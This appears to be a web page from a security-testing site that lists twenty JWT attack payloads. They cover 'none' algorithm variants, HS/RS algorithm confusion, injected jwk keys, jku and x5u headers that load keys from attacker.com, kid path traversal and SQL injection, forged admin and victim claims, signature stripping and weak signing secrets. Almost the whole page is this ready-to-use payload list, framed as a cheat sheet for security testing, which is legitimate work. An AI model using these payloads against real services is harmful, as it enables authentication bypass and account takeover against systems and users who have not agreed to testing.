$loading...
JWT attack payloads for algorithm confusion, none algorithm, key injection, and claim manipulation. (20 payloads)
{"alg":"none","typ":"JWT"}{"alg":"None","typ":"JWT"}{"alg":"NONE","typ":"JWT"}{"alg":"nOnE","typ":"JWT"}{"alg":"HS256","typ":"JWT"} signed with RSA public key{"alg":"HS384","typ":"JWT"} signed with RS384 public key{"alg":"HS256","typ":"JWT","jwk":{"kty":"oct","k":"<attacker-key>"}}{"alg":"RS256","typ":"JWT","jku":"https://attacker.com/.well-known/jwks.json"}{"alg":"RS256","typ":"JWT","x5u":"https://attacker.com/key.crt"}{"alg":"HS256","typ":"JWT","kid":"../../dev/null"}{"alg":"HS256","typ":"JWT","kid":"key' UNION SELECT 'secret'--"}{"sub":"admin","role":"admin","iat":...}{"exp":9999999999}{"sub":"victim","email":"attacker@evil.com"}{"iss":"trusted-issuer"}{"aud":"admin-panel"}eyJ...eyJ... (no signature part)eyJ...eyJ...AA==Sign with empty string as secretSign with "secret", "password", "123456"Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides